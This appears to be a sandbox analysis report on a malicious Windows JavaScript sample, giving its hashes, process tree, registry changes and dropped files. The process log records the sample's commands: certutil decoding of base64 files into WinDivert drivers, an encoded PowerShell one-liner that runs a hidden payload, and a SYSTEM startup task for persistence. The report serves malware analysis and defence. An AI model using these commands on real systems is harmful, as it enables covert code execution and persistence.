| File name: | 50dc928b873485cc8c198106ed99af1f42224791c2fea86436c1bc5ea558112f_bav01.js |
| Full analysis: | https://app.any.run/tasks/e2f9d358-8b69-4b95-ab7d-b2e6e56e0509 |
| Verdict: | Malicious activity |
| Analysis date: | July 11, 2019, 15:52:54 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines, with CRLF line terminators |
| MD5: | 45F19E09D830BA6430591D95C1669E74 |
| SHA1: | F8D0D6C771AB955A1E6D87C258BF8CE316283E3B |
| SHA256: | 50DC928B873485CC8C198106ED99AF1F42224791C2FEA86436C1BC5EA558112F |
| SSDEEP: | 6144:B8WglNO91dDtKicfluSPNpSrJo4jNILX+:tgjOdDtryPSrJPjAX+ |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 576 | "C:\Windows\System32\certutil.exe" -decode "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert.b64" "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert.dll" | C:\Windows\System32\certutil.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2208 | "C:\Windows\System32\certutil.exe" -decode "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert32.b64" "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert32.sys" | C:\Windows\System32\certutil.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2652 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABkAGYAZwBoAGoAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAbgB2ADoAbgB0AHQAeQB1AHUAeQB0ACkAKQA7ACQAZQBuAHYAOgBuAHQAdAB5AHUAdQB5AHQAPQAiACIAOwBpAGUAeAAgACQAZABmAGcAaABqAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2664 | "C:\Windows\System32\schtasks.exe" /create /SC onstart /RU SYSTEM /RL HIGHEST /TN khdgjufkskfhgjdsfk /TR "C:\Windows\system32\wscript.exe C:\Users\admin\AppData\Local\Temp\50dc928b873485cc8c198106ed99af1f42224791c2fea86436c1bc5ea558112f_bav01.js" | C:\Windows\System32\schtasks.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3168 | "C:\Windows\System32\certutil.exe" -decode "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert64.b64" "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert64.sys" | C:\Windows\System32\certutil.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3336 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\50dc928b873485cc8c198106ed99af1f42224791c2fea86436c1bc5ea558112f_bav01.js" | C:\Windows\System32\WScript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| (PID) Process: | (3336) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (3336) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (2652) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3336 | WScript.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert.b64 | — | |
MD5:— | SHA256:— | |||
| 3336 | WScript.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert32.b64 | — | |
MD5:— | SHA256:— | |||
| 2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NBUAINJQ0CDWM3NPIEDW.temp | — | |
MD5:— | SHA256:— | |||
| 2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF166eeb.TMP | binary | |
MD5:— | SHA256:— | |||
| 3336 | WScript.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert64.b64 | text | |
MD5:0A9B3DE9A052F6BBF9B5E205CED145DF | SHA256:C2C508355CD84DC5D7D8377C90E8590B3D675F41B6308C44CD618303A93EB811 | |||
| 2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 2208 | certutil.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert32.sys | executable | |
MD5:492CB6C0C74695D901C05DFFF160FE3C | SHA256:7DEC92B9ED7D00DF0D5EE1EE4C32510AB264F429F4E8226465FF5EBD7B8098F3 | |||
| 3168 | certutil.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert64.sys | executable | |
MD5:66FD4B7D80101B8087CE67BB7C130594 | SHA256:38D3B4DA19768B89C6008CB3BD9FE9157DA7AFEE4587D97493A658D23F2FC2DE | |||
| 576 | certutil.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert.dll | executable | |
MD5:AA491FE40F8A9A70CF5D5F82E1679DBE | SHA256:091F220F3E815A5D2B246A71B6090DAD0BCF1D5D3A04ABC3E5D798F81781F6B6 | |||